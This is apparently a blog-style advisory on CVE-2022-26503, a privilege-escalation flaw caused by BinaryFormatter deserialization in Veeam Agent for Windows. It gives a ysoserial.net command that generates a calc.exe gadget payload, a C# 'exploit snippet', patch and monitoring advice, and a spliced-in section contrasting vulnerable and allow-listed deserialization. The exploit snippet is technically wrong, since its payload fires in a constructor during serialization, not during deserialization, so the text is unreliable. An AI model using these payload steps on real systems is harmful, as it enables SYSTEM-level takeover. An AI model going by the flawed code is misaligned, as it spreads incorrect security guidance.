
In this deep dive, we uncover how CVE-2022-26503 allows attackers to turn Veeam Agent for Windows into a tool for escalating privileges to SYSTEM. We’ll see how deserialization opens the door, explore real-world exploitation scenarios, and give you resources to learn more.

What Is CVE-2022-26503?

CVE-2022-26503 is a privilege escalation vulnerability in Veeam Agent for Windows, a widely used backup and restore solution for Windows computers, including workstations and servers.

> Affected versions:
> - 2.0
> - 2.1
> - 2.2
> - 3.0.2
> - All 4.x
> - All 5.x

In short: A local user with minimal rights can pass specially-crafted data to the Veeam system service. If Veeam deserializes this data, the attacker can make the agent run arbitrary code – as SYSTEM.

Reference:
- Veeam Security Advisory VSA-2022-0704
- NVD Entry CVE-2022-26503

Why Is Deserialization So Dangerous?

Deserialization is converting an object from a stored or transferred format (like a file or network data) into an in-memory object. If the input isn’t verified, attackers can slip in malicious objects that, when deserialized, trigger dangerous actions.

Here’s a super-simple analogy: Imagine you ask a stranger to mail you a box of Legos in a certain arrangement. You trust them and pour the Legos out blindly to use them, but if they hid a small bomb made of Legos inside…

How the Flaw Happens in Veeam Agent for Windows

Veeam Agent for Windows runs privileged services such as Veeam.Agent.Configurator.exe (among others), generally as SYSTEM.

- Some of these agent components accept external data and process it with .NET serialization (BinaryFormatter).
- These components fail to validate that the deserialized data comes from a trusted source.

Result:
A local unprivileged attacker can inject a malicious .NET object where Veeam expects innocuous serialized data. When Veeam calls .Deserialize() on that data, attacker code executes _as SYSTEM_.

- The attacker writes a malicious serialized payload (using tools like ysoserial.net).
- The attacker finds a way to deliver it to the vulnerable Veeam agent process (typically via a named pipe or a file, depending on the Veeam version).
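As an added example (not code from this post or from Veeam), here is the pattern this bug class comes down to in C#: a service that hands a caller-controlled stream straight to BinaryFormatter, beside a version that installs a SerializationBinder allow-list so only the one expected message type can be instantiated. BackupJobRequest is a hypothetical stand-in type, and the code assumes .NET Framework 4.x, where BinaryFormatter is still enabled.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;

// Hypothetical request type a privileged service might expect (not a real Veeam type).
[Serializable]
public sealed class BackupJobRequest
{
    public string JobName;
    public int RetentionDays;
}

// Allow-list binder: BinaryFormatter asks it to resolve every type name found in
// the stream before instantiating anything, so unknown types are refused up front.
public sealed class AllowListBinder : SerializationBinder
{
    private static readonly HashSet<string> Allowed =
        new HashSet<string> { typeof(BackupJobRequest).FullName };
    public override Type BindToType(string assemblyName, string typeName)
    {
        if (!Allowed.Contains(typeName))
            throw new SerializationException("Unexpected type in stream: " + typeName);
        return typeof(BackupJobRequest);
    }
}

public static class Demo
{
    // VULNERABLE: any type the sender names is materialised, gadget chains included.
    public static object DeserializeUnsafe(Stream s) => new BinaryFormatter().Deserialize(s);
    // HARDENED: the binder vetoes every type not on the allow list.
    public static object DeserializeChecked(Stream s) =>
        new BinaryFormatter { Binder = new AllowListBinder() }.Deserialize(s);

    public static void Main()
    {
        // Constructed sample 1: a legitimate request round-trips normally.
        var ok = new MemoryStream();
        new BinaryFormatter().Serialize(ok, new BackupJobRequest { JobName = "nightly", RetentionDays = 14 });
        ok.Position = 0;
        Console.WriteLine("accepted: " + ((BackupJobRequest)DeserializeChecked(ok)).JobName);
        // Constructed sample 2: a harmless unexpected type stands in for a gadget chain.
        var bad = new MemoryStream();
        new BinaryFormatter().Serialize(bad, new List<string> { "not a job" });
        bad.Position = 0;
        try { DeserializeChecked(bad); }
        catch (SerializationException e) { Console.WriteLine("rejected: " + e.Message); }
    }
}
```

A binder narrows the attack surface, but Microsoft's BinaryFormatter guidance treats it as only a partial mitigation; the durable fix is to replace BinaryFormatter with a serializer that does not carry type information in the payload, such as System.Text.Json.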

Code Sample: Building a Deserialization Payload

Let’s say you want to pop a calculator with SYSTEM rights during exploitation. Tools like ysoserial.net make this straightforward.

Example payload generation:

```
ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -o raw -c "calc.exe" > payload.bin
```

This creates a .NET BinaryFormatter payload that launches calc.exe.

Exploit Snippet

Below is simplified C# code a pentester might use to test the vulnerability. It mimics an attacker preparing a payload:

```csharp
using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;

namespace VeeamPayload
{
    class Program
    {
        static void Main(string[] args)
        {
            // Malicious object that triggers code execution
            var payload = new ExploitObject();

            // Serialize it to a file
            using (var file = File.OpenWrite("payload.bin"))
            {
                new BinaryFormatter().Serialize(file, payload);
            }
        }
    }

    // WARNING: This is just a demonstration object!
    [Serializable]
    public class ExploitObject : MarshalByRefObject
    {
        public ExploitObject()
        {
            System.Diagnostics.Process.Start("calc.exe"); // launches calculator
        }
    }
}
```

An attacker would inject the resulting payload.bin into the communication channel or file that the Veeam service reads and deserializes.

Proof-of-Concept Exploits

While full weaponized public exploits are rare (due to ethical/legal concerns), several researchers have demonstrated LPE using deserialization in Veeam. You can find related writeups and PoCs here:

- Horizon3.ai Writeup & PoC (external blog)
- Exploit DB Entry

How to Stay Safe

- Patch immediately — Upgrade Veeam Agent for Windows to 5.0.3.4708 or later (see official download links).
- Restrict local access — Prevent untrusted users from logging into sensitive systems.
- Monitor for strange child processes spawned by Veeam services (e.g., Veeam.Agent.Configurator.exe launching cmd.exe or calc.exe).

Conclusion

CVE-2022-26503 demonstrates how dangerous deserialization bugs are—especially in trusted, highly privileged services like Veeam. Always treat any object coming from outside your secure perimeter as _hostile_, and never deserialize data you don’t control.

Further Reading and References

- Veeam’s Official KB
- National Vulnerability Database: CVE-2022-26503
- Horizon3.ai Research
- ysoserial.net – GitHub
*Stay secure, stay updated – and always double-check what you’re deserializing!*

Timeline

Published on: 03/17/2022 17:15:00 UTC
Last modified on: 03/23/2022 19:06:00 UTC